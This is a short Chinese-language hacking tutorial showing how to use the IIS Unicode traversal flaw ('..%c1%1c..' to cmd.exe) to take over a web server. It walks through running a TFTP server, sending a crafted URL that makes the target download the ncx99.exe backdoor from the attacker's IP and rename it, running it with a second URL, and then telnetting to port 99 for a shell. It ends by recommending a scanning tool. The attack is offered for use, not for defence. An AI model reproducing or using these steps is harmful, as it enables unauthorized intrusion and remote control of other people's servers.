经过比较,让服务器下载木马的方法较好:
首先,下载http://www.cners.com/tools/unicode.zip
解压后有如下文件:
tftpd32.exe(一个FTP服务器)
ncx99.exe(telnet 到99端口)
这两个大家都熟悉吧,其他的不用管。
运行tftpd32.exe
这是一个小巧的FTP服务器,在运行它之前,建议关闭其他FTP服务器,保持tftpd运行,这时你的机器已经是一个FTP服务器了。
回到你的浏览器,在地址栏里填入:
http://202.100.100.1/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+tftp -i ???.???.???.??? GET ncx99.exe c:\\inetpub\\scripts\\sr.exe
???.???.???.???为你自己的IP,注意:c:\\inetpub\\scripts\\sr.exe 其中c:\\inetpub\\scripts\\为主机服务器目录,要看主机的具体情
况而定,sr.exe为被改名的ncx99.exe(自己选名字吧)。
然后等待...大概3分钟...IE浏览器左下角显示完成,红色漏斗消失,这时ncx99.exe已经上传到主机c:\inetpub\scripts\目录了,您可以自己检查一下。
再使用如下调用来执行ncx99.exe(sr.exe)
http://202.100.100.1/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+c:\inetpub\scripts\sr.exe
然后您就可以 telnet 202.100.100.1 99
以后就看你怎么使用这台机器了。当然您上传什么控制文件也由您自己决定,这只是一个方法。
我推荐一个扫描工具“rscan”